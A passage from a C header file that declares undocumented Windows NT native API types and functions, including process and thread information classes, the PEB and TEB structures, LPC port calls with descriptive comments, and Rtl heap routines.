2494 | IN ULONG InputBufferLength, 2495 | IN PVOID OutputBuffer, 2496 | IN ULONG OutputBufferLength 2497 | ); 2498 | 2499 | 2500 | NTSYSAPI 2501 | NTSTATUS 2502 | NTAPI 2503 | NtCancelIoFile( 2504 | IN HANDLE Filehandle, 2505 | OUT PIO_STATUS_BLOCK IoStatusBlock 2506 | ); 2507 | 2508 | 2509 | NTSYSAPI 2510 | NTSTATUS 2511 | NTAPI 2512 | ZwCancelIoFile( 2513 | IN HANDLE Filehandle, 2514 | OUT PIO_STATUS_BLOCK IoStatusBlock 2515 | ); 2516 | 2517 | 2518 | NTSYSAPI 2519 | BOOLEAN 2520 | NTAPI 2521 | RtlDosPathNameToNtPathName_U ( 2522 | IN PWSTR DosPathName, 2523 | OUT PUNICODE_STRING NtPathName, 2524 | OUT PWSTR * NtFileNamePart OPTIONAL, 2525 | OUT PCURDIR DirectoryInfo OPTIONAL 2526 | ); 2527 | 2528 | 2529 | //----------------------------------------------------------------------------- 2530 | // Process functions 2531 | 2532 | #define GDI_HANDLE_BUFFER_SIZE 34 2533 | 2534 | // 2535 | // Process Information Classes 2536 | // 2537 | 2538 | typedef enum _PROCESSINFOCLASS { 2539 | ProcessBasicInformation, 2540 | ProcessQuotaLimits, 2541 | ProcessIoCounters, 2542 | ProcessVmCounters, 2543 | ProcessTimes, 2544 | ProcessBasePriority, 2545 | ProcessRaisePriority, 2546 | ProcessDebugPort, 2547 | ProcessExceptionPort, 2548 | ProcessAccessToken, 2549 | ProcessLdtInformation, 2550 | ProcessLdtSize, 2551 | ProcessDefaultHardErrorMode, 2552 | ProcessIoPortHandlers, // Note: this is kernel mode only 2553 | ProcessPooledUsageAndLimits, 2554 | ProcessWorkingSetWatch, 2555 | ProcessUserModeIOPL, 2556 | ProcessEnableAlignmentFaultFixup, 2557 | ProcessPriorityClass, 2558 | ProcessWx86Information, 2559 | ProcessHandleCount, 2560 | ProcessAffinityMask, 2561 | ProcessPriorityBoost, 2562 | ProcessDeviceMap, 2563 | ProcessSessionInformation, 2564 | ProcessForegroundInformation, 2565 | ProcessWow64Information, 2566 | ProcessImageFileName, 2567 | ProcessLUIDDeviceMapsEnabled, 2568 | ProcessBreakOnTermination, 2569 | ProcessDebugObjectHandle, 2570 | ProcessDebugFlags, 2571 | ProcessHandleTracing, 2572 | MaxProcessInfoClass // MaxProcessInfoClass should always be the last enum 2573 | } PROCESSINFOCLASS; 2574 | 2575 | // 2576 | // Thread Information Classes 2577 | // 2578 | 2579 | typedef enum _THREADINFOCLASS { 2580 | ThreadBasicInformation, // ?? 2581 | ThreadTimes, 2582 | ThreadPriority, // ?? 2583 | ThreadBasePriority, // ?? 2584 | ThreadAffinityMask, // ?? 2585 | ThreadImpersonationToken, // HANDLE 2586 | ThreadDescriptorTableEntry, // ULONG Selector + LDT_ENTRY 2587 | ThreadEnableAlignmentFaultFixup, // ?? 2588 | ThreadEventPair, // ?? 2589 | ThreadQuerySetWin32StartAddress, // ?? 2590 | ThreadZeroTlsCell, // ?? 2591 | ThreadPerformanceCount, // ?? 2592 | ThreadAmILastThread, // ?? 2593 | ThreadIdealProcessor, // ?? 2594 | ThreadPriorityBoost, // ?? 2595 | ThreadSetTlsArrayAddress, // ?? 2596 | MaxThreadInfoClass 2597 | } THREADINFOCLASS; 2598 | 2599 | 2600 | typedef struct _RTL_DRIVE_LETTER_CURDIR 2601 | { 2602 | USHORT Flags; 2603 | USHORT Length; 2604 | ULONG TimeStamp; 2605 | STRING DosPath; 2606 | 2607 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 2608 | 2609 | 2610 | typedef struct _RTL_USER_PROCESS_PARAMETERS 2611 | { 2612 | ULONG MaximumLength; // Should be set before call RtlCreateProcessParameters 2613 | ULONG Length; // Length of valid structure 2614 | ULONG Flags; // Currently only PPF_NORMALIZED (1) is known: 2615 | // - Means that structure is normalized by call RtlNormalizeProcessParameters 2616 | ULONG DebugFlags; 2617 | 2618 | PVOID ConsoleHandle; // HWND to console window associated with process (if any). 2619 | ULONG ConsoleFlags; 2620 | HANDLE StandardInput; 2621 | HANDLE StandardOutput; 2622 | HANDLE StandardError; 2623 | 2624 | CURDIR CurrentDirectory; // Specified in DOS-like symbolic link path, ex: "C:/WinNT/SYSTEM32" 2625 | UNICODE_STRING DllPath; // DOS-like paths separated by ';' where system should search for DLL files. 2626 | UNICODE_STRING ImagePathName; // Full path in DOS-like format to process'es file image. 2627 | UNICODE_STRING CommandLine; // Command line 2628 | PVOID Environment; // Pointer to environment block (see RtlCreateEnvironment) 2629 | ULONG StartingX; 2630 | ULONG StartingY; 2631 | ULONG CountX; 2632 | ULONG CountY; 2633 | ULONG CountCharsX; 2634 | ULONG CountCharsY; 2635 | ULONG FillAttribute; // Fill attribute for console window 2636 | ULONG WindowFlags; 2637 | ULONG ShowWindowFlags; 2638 | UNICODE_STRING WindowTitle; 2639 | UNICODE_STRING DesktopInfo; // Name of WindowStation and Desktop objects, where process is assigned 2640 | UNICODE_STRING ShellInfo; 2641 | UNICODE_STRING RuntimeData; 2642 | RTL_DRIVE_LETTER_CURDIR CurrentDirectores[0x20]; 2643 | ULONG EnvironmentSize; 2644 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 2645 | 2646 | // 2647 | // Process Environment Block 2648 | // 2649 | 2650 | typedef struct _PEB_FREE_BLOCK 2651 | { 2652 | struct _PEB_FREE_BLOCK *Next; 2653 | ULONG Size; 2654 | 2655 | } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; 2656 | 2657 | 2658 | typedef struct _PEB_LDR_DATA 2659 | { 2660 | ULONG Length; 2661 | BOOLEAN Initialized; 2662 | HANDLE SsHandle; 2663 | LIST_ENTRY InLoadOrderModuleList; // Points to the loaded modules (main EXE usually) 2664 | LIST_ENTRY InMemoryOrderModuleList; // Points to all modules (EXE and all DLLs) 2665 | LIST_ENTRY InInitializationOrderModuleList; 2666 | PVOID EntryInProgress; 2667 | 2668 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 2669 | 2670 | 2671 | typedef struct _LDR_DATA_TABLE_ENTRY 2672 | { 2673 | LIST_ENTRY InLoadOrderLinks; 2674 | LIST_ENTRY InMemoryOrderLinks; 2675 | LIST_ENTRY InInitializationOrderLinks; 2676 | PVOID DllBase; // Base address of the module 2677 | PVOID EntryPoint; 2678 | ULONG SizeOfImage; 2679 | UNICODE_STRING FullDllName; 2680 | UNICODE_STRING BaseDllName; 2681 | ULONG Flags; 2682 | USHORT LoadCount; 2683 | USHORT TlsIndex; 2684 | LIST_ENTRY HashLinks; 2685 | PVOID SectionPointer; 2686 | ULONG CheckSum; 2687 | ULONG TimeDateStamp; 2688 | PVOID LoadedImports; 2689 | PVOID EntryPointActivationContext; 2690 | PVOID PatchInformation; 2691 | PVOID Unknown1; 2692 | PVOID Unknown2; 2693 | PVOID Unknown3; 2694 | 2695 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 2696 | 2697 | 2698 | typedef struct _PEB 2699 | { 2700 | BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the 2701 | BOOLEAN ReadImageFileExecOptions; // 2702 | BOOLEAN BeingDebugged; // 2703 | BOOLEAN SpareBool; // 2704 | HANDLE Mutant; // INITIAL_PEB structure is also updated. 2705 | 2706 | PVOID ImageBaseAddress; 2707 | PPEB_LDR_DATA Ldr; 2708 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 2709 | PVOID SubSystemData; 2710 | PVOID ProcessHeap; 2711 | PVOID FastPebLock; 2712 | PVOID FastPebLockRoutine; 2713 | PVOID FastPebUnlockRoutine; 2714 | ULONG EnvironmentUpdateCount; 2715 | PVOID KernelCallbackTable; 2716 | HANDLE SystemReserved; 2717 | PVOID AtlThunkSListPtr32; 2718 | PPEB_FREE_BLOCK FreeList; 2719 | ULONG TlsExpansionCounter; 2720 | PVOID TlsBitmap; 2721 | ULONG TlsBitmapBits[2]; // relates to TLS_MINIMUM_AVAILABLE 2722 | PVOID ReadOnlySharedMemoryBase; 2723 | PVOID ReadOnlySharedMemoryHeap; 2724 | PVOID *ReadOnlyStaticServerData; 2725 | PVOID AnsiCodePageData; 2726 | PVOID OemCodePageData; 2727 | PVOID UnicodeCaseTableData; 2728 | 2729 | // 2730 | // Useful information for LdrpInitialize 2731 | 2732 | ULONG NumberOfProcessors; 2733 | ULONG NtGlobalFlag; 2734 | 2735 | // 2736 | // Passed up from MmCreatePeb from Session Manager registry key 2737 | // 2738 | 2739 | LARGE_INTEGER CriticalSectionTimeout; 2740 | ULONG HeapSegmentReserve; 2741 | ULONG HeapSegmentCommit; 2742 | ULONG HeapDeCommitTotalFreeThreshold; 2743 | ULONG HeapDeCommitFreeBlockThreshold; 2744 | 2745 | // 2746 | // Where heap manager keeps track of all heaps created for a process 2747 | // Fields initialized by MmCreatePeb. ProcessHeaps is initialized 2748 | // to point to the first free byte after the PEB and MaximumNumberOfHeaps 2749 | // is computed from the page size used to hold the PEB, less the fixed 2750 | // size of this data structure. 2751 | // 2752 | 2753 | ULONG NumberOfHeaps; 2754 | ULONG MaximumNumberOfHeaps; 2755 | PVOID *ProcessHeaps; 2756 | 2757 | // 2758 | // 2759 | PVOID GdiSharedHandleTable; 2760 | PVOID ProcessStarterHelper; 2761 | PVOID GdiDCAttributeList; 2762 | PVOID LoaderLock; 2763 | 2764 | // 2765 | // Following fields filled in by MmCreatePeb from system values and/or 2766 | // image header. These fields have changed since Windows NT 4.0, 2767 | // so use with caution 2768 | // 2769 | 2770 | ULONG OSMajorVersion; 2771 | ULONG OSMinorVersion; 2772 | USHORT OSBuildNumber; 2773 | USHORT OSCSDVersion; 2774 | ULONG OSPlatformId; 2775 | ULONG ImageSubsystem; 2776 | ULONG ImageSubsystemMajorVersion; 2777 | ULONG ImageSubsystemMinorVersion; 2778 | ULONG ImageProcessAffinityMask; 2779 | ULONG GdiHandleBuffer[GDI_HANDLE_BUFFER_SIZE]; 2780 | 2781 | } PEB, *PPEB; 2782 | 2783 | 2784 | // 2785 | // Thread environment block 2786 | // 2787 | 2788 | typedef struct _TEB 2789 | { 2790 | NT_TIB NtTib; 2791 | PVOID EnvironmentPointer; 2792 | CLIENT_ID ClientId; 2793 | PVOID ActiveRpcHandle; 2794 | PVOID ThreadLocalStoragePointer; 2795 | PPEB ProcessEnvironmentBlock; 2796 | ULONG LastErrorValue; 2797 | ULONG CountOfOwnedCriticalSections; 2798 | PVOID CsrClientThread; 2799 | PVOID Win32ThreadInfo; 2800 | // Incomplete 2801 | 2802 | } TEB, *PTEB; 2803 | 2804 | 2805 | typedef struct _PROCESS_BASIC_INFORMATION 2806 | { 2807 | NTSTATUS ExitStatus; 2808 | PPEB PebBaseAddress; 2809 | ULONG_PTR AffinityMask; 2810 | KPRIORITY BasePriority; 2811 | ULONG_PTR UniqueProcessId; 2812 | ULONG_PTR InheritedFromUniqueProcessId; 2813 | 2814 | } PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION; 2815 | 2816 | 2817 | 2818 | #define NtCurrentProcess() ((HANDLE) -1) 2819 | #define NtCurrentThread() ((HANDLE) -2) 2820 | 2821 | NTSYSAPI 2822 | NTSTATUS 2823 | NTAPI 2824 | NtOpenProcess ( 2825 | OUT PHANDLE ProcessHandle, 2826 | IN ACCESS_MASK DesiredAccess, 2827 | IN POBJECT_ATTRIBUTES ObjectAttributes, 2828 | IN PCLIENT_ID ClientId OPTIONAL 2829 | ); 2830 | 2831 | NTSYSCALLAPI 2832 | NTSTATUS 2833 | NTAPI 2834 | NtSuspendProcess( 2835 | IN HANDLE ProcessHandle 2836 | ); 2837 | 2838 | NTSYSCALLAPI 2839 | NTSTATUS 2840 | NTAPI 2841 | NtResumeProcess( 2842 | IN HANDLE ProcessHandle 2843 | ); 2844 | 2845 | NTSYSAPI 2846 | NTSTATUS 2847 | NTAPI 2848 | NtOpenThread ( 2849 | OUT PHANDLE ThreadHandle, 2850 | IN ACCESS_MASK DesiredAccess, 2851 | IN POBJECT_ATTRIBUTES ObjectAttributes, 2852 | IN PCLIENT_ID ClientId OPTIONAL 2853 | ); 2854 | 2855 | NTSYSAPI 2856 | NTSTATUS 2857 | NTAPI 2858 | NtQueryInformationThread( 2859 | IN HANDLE ThreadHandle, 2860 | IN THREADINFOCLASS ThreadInformationClass, 2861 | OUT PVOID ThreadInformation, 2862 | IN ULONG ThreadInformationLength, 2863 | OUT PULONG ReturnLength OPTIONAL 2864 | ); 2865 | 2866 | NTSYSAPI 2867 | NTSTATUS 2868 | NTAPI 2869 | NtQueryInformationProcess( 2870 | IN HANDLE ProcessHandle, 2871 | IN PROCESSINFOCLASS ProcessInformationClass, 2872 | OUT PVOID ProcessInformation, 2873 | IN ULONG ProcessInformationLength, 2874 | OUT PULONG ReturnLength OPTIONAL 2875 | ); 2876 | 2877 | 2878 | NTSYSAPI 2879 | NTSTATUS 2880 | NTAPI 2881 | NtSetInformationProcess ( 2882 | IN HANDLE ProcessHandle, 2883 | IN PROCESSINFOCLASS ProcessInformationClass, 2884 | IN PVOID ProcessInformation, 2885 | IN ULONG ProcessInformationLength 2886 | ); 2887 | 2888 | //------------------------------------------------------------------------------ 2889 | // LPC Functions 2890 | 2891 | #define MAX_LPC_DATA 0x130 // Maximum number of bytes that can be copied through LPC 2892 | 2893 | // LPC connection types 2894 | typedef enum _LPC_TYPE 2895 | { 2896 | LPC_NEW_MESSAGE, // (0) A new message 2897 | LPC_REQUEST, // (1) A request message 2898 | LPC_REPLY, // (2) A reply to a request message 2899 | LPC_DATAGRAM, // (3) 2900 | LPC_LOST_REPLY, // (4) 2901 | LPC_PORT_CLOSED, // (5) Send when port is deleted 2902 | LPC_CLIENT_DIED, // (6) Messages to thread termination ports 2903 | LPC_EXCEPTION, // (7) Messages to thread exception ports 2904 | LPC_DEBUG_EVENT, // (8) Messages to thread debug port 2905 | LPC_ERROR_EVENT, // (9) Used by NtRaiseHardError 2906 | LPC_CONNECTION_REQUEST // (A) Used by NtConnectPort 2907 | 2908 | } LPC_TYPE, *PLPC_TYPE; 2909 | 2910 | // 2911 | // Define header for Port Message 2912 | // 2913 | 2914 | typedef struct _PORT_MESSAGE 2915 | { 2916 | USHORT DataLength; // Length of data following the header (bytes) 2917 | USHORT TotalLength; // Length of data + sizeof(PORT_MESSAGE) 2918 | USHORT Type; // Type of the message (See LPC_TYPE enum) 2919 | USHORT VirtualRangesOffset; // Offset of array of virtual address ranges 2920 | CLIENT_ID ClientId; // Client identifier of the message sender 2921 | ULONG MessageId; // Identifier of the particular message instance 2922 | union 2923 | { 2924 | ULONG CallbackId; // 2925 | ULONG ClientViewSize; // Size, in bytes, of section created by the sender 2926 | }; 2927 | 2928 | } PORT_MESSAGE, *PPORT_MESSAGE; 2929 | 2930 | // 2931 | // Define structure for initializing shared memory on the caller's side of the port 2932 | // 2933 | 2934 | typedef struct _PORT_VIEW { 2935 | 2936 | ULONG Length; // Size of this structure 2937 | HANDLE SectionHandle; // Handle to section object with 2938 | // SECTION_MAP_WRITE and SECTION_MAP_READ 2939 | ULONG SectionOffset; // The offset in the section to map a view for 2940 | // the port data area. The offset must be aligned 2941 | // with the allocation granularity of the system. 2942 | ULONG ViewSize; // The size of the view (in bytes) 2943 | PVOID ViewBase; // The base address of the view in the creator 2944 | // 2945 | PVOID ViewRemoteBase; // The base address of the view in the process 2946 | // connected to the port. 2947 | } PORT_VIEW, *PPORT_VIEW; 2948 | 2949 | // 2950 | // Define structure for shared memory coming from remote side of the port 2951 | // 2952 | 2953 | typedef struct _REMOTE_PORT_VIEW { 2954 | 2955 | ULONG Length; // Size of this structure 2956 | ULONG ViewSize; // The size of the view (bytes) 2957 | PVOID ViewBase; // Base address of the view 2958 | 2959 | } REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; 2960 | 2961 | /*++ 2962 | 2963 | NtCreatePort 2964 | ============ 2965 | 2966 | Creates a LPC port object. The creator of the LPC port becomes a server 2967 | of LPC communication 2968 | 2969 | PortHandle - Points to a variable that will receive the 2970 | port object handle if the call is successful. 2971 | 2972 | ObjectAttributes - Points to a structure that specifies the object s 2973 | attributes. OBJ_KERNEL_HANDLE, OBJ_OPENLINK, OBJ_OPENIF, OBJ_EXCLUSIVE, 2974 | OBJ_PERMANENT, and OBJ_INHERIT are not valid attributes for a port object. 2975 | 2976 | MaxConnectionInfoLength - The maximum size, in bytes, of data that can 2977 | be sent through the port. 2978 | 2979 | MaxMessageLength - The maximum size, in bytes, of a message 2980 | that can be sent through the port. 2981 | 2982 | MaxPoolUsage - Specifies the maximum amount of NonPaged pool that can be used for 2983 | message storage. Zero means default value. 2984 | 2985 | ZwCreatePort verifies that (MaxDataSize <= 0x104) and (MaxMessageSize <= 0x148). 2986 | 2987 | --*/ 2988 | 2989 | NTSYSAPI 2990 | NTSTATUS 2991 | NTAPI 2992 | NtCreatePort( 2993 | OUT PHANDLE PortHandle, 2994 | IN POBJECT_ATTRIBUTES ObjectAttributes, 2995 | IN ULONG MaxConnectionInfoLength, 2996 | IN ULONG MaxMessageLength, 2997 | IN ULONG MaxPoolUsage 2998 | ); 2999 | 3000 | 3001 | /*++ 3002 | 3003 | NtConnectPort 3004 | ============= 3005 | 3006 | Creates a port connected to a named port (cliend side). 3007 | 3008 | PortHandle - A pointer to a variable that will receive the client 3009 | communication port object handle value. 3010 | 3011 | PortName - Points to a structure that specifies the name 3012 | of the port to connect to. 3013 | 3014 | SecurityQos - Points to a structure that specifies the level 3015 | of impersonation available to the port listener. 3016 | 3017 | ClientView - Optionally points to a structure describing 3018 | the shared memory region used to send large amounts of data 3019 | to the listener; if the call is successful, this will be updated. 3020 | 3021 | ServerView - Optionally points to a caller-allocated buffer 3022 | or variable that receives information on the shared memory region 3023 | used by the listener to send large amounts of data to the 3024 | caller. 3025 | 3026 | MaxMessageLength - Optionally points to a variable that receives the size, 3027 | in bytes, of the largest message that can be sent through the port. 3028 | 3029 | ConnectionInformation - Optionally points to a caller-allocated 3030 | buffer or variable that specifies connect data to send to the listener, 3031 | and receives connect data sent by the listener. 3032 | 3033 | ConnectionInformationLength - Optionally points to a variable that 3034 | specifies the size, in bytes, of the connect data to send 3035 | to the listener, and receives the size of the connect data 3036 | sent by the listener. 3037 | 3038 | --*/ 3039 | 3040 | NTSYSAPI 3041 | NTSTATUS 3042 | NTAPI 3043 | NtConnectPort( 3044 | OUT PHANDLE PortHandle, 3045 | IN PUNICODE_STRING PortName, 3046 | IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, 3047 | IN OUT PPORT_VIEW ClientView OPTIONAL, 3048 | OUT PREMOTE_PORT_VIEW ServerView OPTIONAL, 3049 | OUT PULONG MaxMessageLength OPTIONAL, 3050 | IN OUT PVOID ConnectionInformation OPTIONAL, 3051 | IN OUT PULONG ConnectionInformationLength OPTIONAL 3052 | ); 3053 | 3054 | 3055 | NTSYSAPI 3056 | NTSTATUS 3057 | NTAPI 3058 | ZwConnectPort( 3059 | OUT PHANDLE PortHandle, 3060 | IN PUNICODE_STRING PortName, 3061 | IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, 3062 | IN OUT PPORT_VIEW ClientView OPTIONAL, 3063 | OUT PREMOTE_PORT_VIEW ServerView OPTIONAL, 3064 | OUT PULONG MaxMessageLength OPTIONAL, 3065 | IN OUT PVOID ConnectionInformation OPTIONAL, 3066 | IN OUT PULONG ConnectionInformationLength OPTIONAL 3067 | ); 3068 | 3069 | 3070 | /*++ 3071 | 3072 | NtListenPort 3073 | ============ 3074 | 3075 | Listens on a port for a connection request message on the server side. 3076 | 3077 | PortHandle - A handle to a port object. The handle doesn't need 3078 | to grant any specific access. 3079 | 3080 | ConnectionRequest - Points to a caller-allocated buffer 3081 | or variable that receives the connect message sent to 3082 | the port. 3083 | 3084 | --*/ 3085 | 3086 | 3087 | NTSYSAPI 3088 | NTSTATUS 3089 | NTAPI 3090 | NtListenPort( 3091 | IN HANDLE PortHandle, 3092 | OUT PPORT_MESSAGE RequestMessage 3093 | ); 3094 | 3095 | /*++ 3096 | 3097 | NtAcceptConnectPort 3098 | =================== 3099 | 3100 | Accepts or rejects a connection request on the server side. 3101 | 3102 | PortHandle - Points to a variable that will receive the port object 3103 | handle if the call is successful. 3104 | 3105 | PortContext - A numeric identifier to be associated with the port. 3106 | 3107 | ConnectionRequest - Points to a caller-allocated buffer or variable 3108 | that identifies the connection request and contains any connect 3109 | data that should be returned to requestor of the connection 3110 | 3111 | AcceptConnection - Specifies whether the connection should 3112 | be accepted or not 3113 | 3114 | ServerView - Optionally points to a structure describing 3115 | the shared memory region used to send large amounts of data to the 3116 | requestor; if the call is successful, this will be updated 3117 | 3118 | ClientView - Optionally points to a caller-allocated buffer 3119 | or variable that receives information on the shared memory 3120 | region used by the requestor to send large amounts of data to the 3121 | caller 3122 | 3123 | --*/ 3124 | 3125 | 3126 | NTSYSAPI 3127 | NTSTATUS 3128 | NTAPI 3129 | NtAcceptConnectPort( 3130 | OUT PHANDLE PortHandle, 3131 | IN PVOID PortContext OPTIONAL, 3132 | IN PPORT_MESSAGE ConnectionRequest, 3133 | IN BOOLEAN AcceptConnection, 3134 | IN OUT PPORT_VIEW ServerView OPTIONAL, 3135 | OUT PREMOTE_PORT_VIEW ClientView OPTIONAL 3136 | ); 3137 | 3138 | /*++ 3139 | 3140 | NtCompleteConnectPort 3141 | ===================== 3142 | 3143 | Completes the port connection process on the server side. 3144 | 3145 | PortHandle - A handle to a port object. The handle doesn't need 3146 | to grant any specific access. 3147 | 3148 | --*/ 3149 | 3150 | 3151 | NTSYSAPI 3152 | NTSTATUS 3153 | NTAPI 3154 | NtCompleteConnectPort( 3155 | IN HANDLE PortHandle 3156 | ); 3157 | 3158 | 3159 | NTSYSAPI 3160 | NTSTATUS 3161 | NTAPI 3162 | ZwCompleteConnectPort( 3163 | IN HANDLE PortHandle 3164 | ); 3165 | 3166 | 3167 | /*++ 3168 | 3169 | NtRequestPort 3170 | ============= 3171 | 3172 | Sends a request message to a port (client side) 3173 | 3174 | PortHandle - A handle to a port object. The handle doesn't need 3175 | to grant any specific access. 3176 | 3177 | RequestMessage - Points to a caller-allocated buffer or variable 3178 | that specifies the request message to send to the port. 3179 | 3180 | --*/ 3181 | 3182 | NTSYSAPI 3183 | NTSTATUS 3184 | NTAPI 3185 | NtRequestPort ( 3186 | IN HANDLE PortHandle, 3187 | IN PPORT_MESSAGE RequestMessage 3188 | ); 3189 | 3190 | /*++ 3191 | 3192 | NtRequestWaitReplyPort 3193 | ====================== 3194 | 3195 | Sends a request message to a port and waits for a reply (client side) 3196 | 3197 | PortHandle - A handle to a port object. The handle doesn't need 3198 | to grant any specific access. 3199 | 3200 | RequestMessage - Points to a caller-allocated buffer or variable 3201 | that specifies the request message to send to the port. 3202 | 3203 | ReplyMessage - Points to a caller-allocated buffer or variable 3204 | that receives the reply message sent to the port. 3205 | 3206 | --*/ 3207 | 3208 | NTSYSAPI 3209 | NTSTATUS 3210 | NTAPI 3211 | NtRequestWaitReplyPort( 3212 | IN HANDLE PortHandle, 3213 | IN PPORT_MESSAGE RequestMessage, 3214 | OUT PPORT_MESSAGE ReplyMessage 3215 | ); 3216 | 3217 | 3218 | NTSYSAPI 3219 | NTSTATUS 3220 | NTAPI 3221 | ZwRequestWaitReplyPort( 3222 | IN HANDLE PortHandle, 3223 | IN PPORT_MESSAGE RequestMessage, 3224 | OUT PPORT_MESSAGE ReplyMessage 3225 | ); 3226 | 3227 | 3228 | /*++ 3229 | 3230 | NtReplyPort 3231 | =========== 3232 | 3233 | Sends a reply message to a port (Server side) 3234 | 3235 | PortHandle - A handle to a port object. The handle doesn't need 3236 | to grant any specific access. 3237 | 3238 | ReplyMessage - Points to a caller-allocated buffer or variable 3239 | that specifies the reply message to send to the port. 3240 | 3241 | --*/ 3242 | 3243 | 3244 | NTSYSAPI 3245 | NTSTATUS 3246 | NTAPI 3247 | NtReplyPort( 3248 | IN HANDLE PortHandle, 3249 | IN PPORT_MESSAGE ReplyMessage 3250 | ); 3251 | 3252 | /*++ 3253 | 3254 | NtReplyWaitReplyPort 3255 | ==================== 3256 | 3257 | Sends a reply message to a port and waits for a reply message 3258 | 3259 | PortHandle - A handle to a port object. The handle doesn't need 3260 | to grant any specific access. 3261 | 3262 | ReplyMessage - Points to a caller-allocated buffer or variable 3263 | that specifies the reply message to send to the port. 3264 | 3265 | --*/ 3266 | 3267 | NTSYSAPI 3268 | NTSTATUS 3269 | NTAPI 3270 | NtReplyWaitReplyPort( 3271 | IN HANDLE PortHandle, 3272 | IN OUT PPORT_MESSAGE ReplyMessage 3273 | ); 3274 | 3275 | 3276 | /*++ 3277 | 3278 | NtReplyWaitReceivePort 3279 | ====================== 3280 | 3281 | Optionally sends a reply message to a port and waits for a 3282 | message 3283 | 3284 | PortHandle - A handle to a port object. The handle doesn't need 3285 | to grant any specific access. 3286 | 3287 | PortContext - Optionally points to a variable that receives 3288 | a numeric identifier associated with the port. 3289 | 3290 | ReplyMessage - Optionally points to a caller-allocated buffer 3291 | or variable that specifies the reply message to send to the port. 3292 | 3293 | ReceiveMessage - Points to a caller-allocated buffer or variable 3294 | that receives the message sent to the port. 3295 | 3296 | --*/ 3297 | 3298 | NTSYSAPI 3299 | NTSTATUS 3300 | NTAPI 3301 | NtReplyWaitReceivePort( 3302 | IN HANDLE PortHandle, 3303 | OUT PVOID *PortContext OPTIONAL, 3304 | IN PPORT_MESSAGE ReplyMessage OPTIONAL, 3305 | OUT PPORT_MESSAGE ReceiveMessage 3306 | ); 3307 | 3308 | //----------------------------------------------------------------------------- 3309 | // Heap functions 3310 | 3311 | #define HEAP_NO_SERIALIZE 0x00000001 3312 | #define HEAP_GROWABLE 0x00000002 3313 | #define HEAP_GENERATE_EXCEPTIONS 0x00000004 3314 | #define HEAP_ZERO_MEMORY 0x00000008 3315 | #define HEAP_REALLOC_IN_PLACE_ONLY 0x00000010 3316 | #define HEAP_TAIL_CHECKING_ENABLED 0x00000020 3317 | #define HEAP_FREE_CHECKING_ENABLED 0x00000040 3318 | #define HEAP_DISABLE_COALESCE_ON_FREE 0x00000080 3319 | #define HEAP_CREATE_ALIGN_16 0x00010000 3320 | #define HEAP_CREATE_ENABLE_TRACING 0x00020000 3321 | #define HEAP_MAXIMUM_TAG 0x0FFF 3322 | #define HEAP_PSEUDO_TAG_FLAG 0x8000 3323 | 3324 | // 3325 | // Data structure for heap definition. This includes various 3326 | // sizing parameters and callback routines, which, if left NULL, 3327 | // result in default behavior 3328 | // 3329 | 3330 | typedef struct RTL_HEAP_PARAMETERS { 3331 | ULONG Length; //sizeof(RTL_HEAP_PARAMETERS) 3332 | ULONG SegmentReserve; 3333 | ULONG SegmentCommit; 3334 | ULONG DeCommitFreeBlockThreshold; 3335 | ULONG DeCommitTotalFreeThreshold; 3336 | ULONG MaximumAllocationSize; 3337 | ULONG VirtualMemoryThreshold; 3338 | ULONG InitialCommit; 3339 | ULONG InitialReserve; 3340 | PVOID CommitRoutine; 3341 | ULONG Reserved; 3342 | } RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS; 3343 | 3344 | 3345 | #define RtlProcessHeap() (HANDLE)(NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap) 3346 | 3347 | 3348 | NTSYSAPI 3349 | HANDLE 3350 | NTAPI 3351 | RtlCreateHeap ( 3352 | IN ULONG Flags, 3353 | IN PVOID BaseAddress OPTIONAL, 3354 | IN ULONG SizeToReserve, 3355 | IN ULONG SizeToCommit, 3356 | IN BOOLEAN Lock OPTIONAL, 3357 | IN PRTL_HEAP_PARAMETERS Definition OPTIONAL 3358 | ); 3359 | 3360 | 3361 | NTSYSAPI 3362 | ULONG 3363 | NTAPI 3364 | RtlDestroyHeap ( 3365 | IN HANDLE HeapHandle 3366 | ); 3367 | 3368 | 3369 | NTSYSAPI 3370 | PVOID 3371 | NTAPI 3372 | RtlAllocateHeap ( 3373 | IN HANDLE HeapHandle, 3374 | IN ULONG Flags, 3375 | IN ULONG Size 3376 | ); 3377 | 3378 | 3379 | NTSYSAPI 3380 | BOOLEAN 3381 | NTAPI 3382 | RtlFreeHeap ( 3383 | IN HANDLE HeapHandle, 3384 | IN ULONG Flags, 3385 | IN PVOID Address 3386 | ); 3387 | 3388 | 3389 | NTSYSAPI 3390 | ULONG 3391 | NTAPI 3392 | RtlCompactHeap ( 3393 | IN HANDLE HeapHandle, 3394 | IN ULONG Flags 3395 | ); 3396 | 3397 | 3398 | NTSYSAPI 3399 | BOOLEAN 3400 | NTAPI 3401 | RtlLockHeap ( 3402 | IN HANDLE HeapHandle 3403 | ); 3404 | 3405 | 3406 | NTSYSAPI 3407 | BOOLEAN 3408 | NTAPI 3409 | RtlUnlockHeap ( 3410 | IN HANDLE HeapHandle 3411 | ); 3412 | 3413 | 3414 | NTSYSAPI 3415 | PVOID 3416 | NTAPI 3417 | RtlReAllocateHeap ( 3418 | IN HANDLE HeapHandle, 3419 | IN ULONG Flags, 3420 | IN PVOID Address, 3421 | IN ULONG Size 3422 | ); 3423 | 3424 | 3425 | NTSYSAPI 3426 | ULONG 3427 | NTAPI 3428 | RtlSizeHeap ( 3429 | IN HANDLE HeapHandle, 3430 | IN ULONG Flags, 3431 | IN PVOID Address 3432 | ); 3433 | 3434 | 3435 | NTSYSAPI 3436 | BOOLEAN 3437 | NTAPI 3438 | RtlValidateHeap ( 3439 | IN HANDLE HeapHandle, 3440 | IN ULONG Flags, 3441 | IN PVOID Address OPTIONAL 3442 | ); 3443 | 3444 | 3445 | //----------------------------------------------------------------------------- 3446 | // Virtual memory functions 3447 | 3448 | 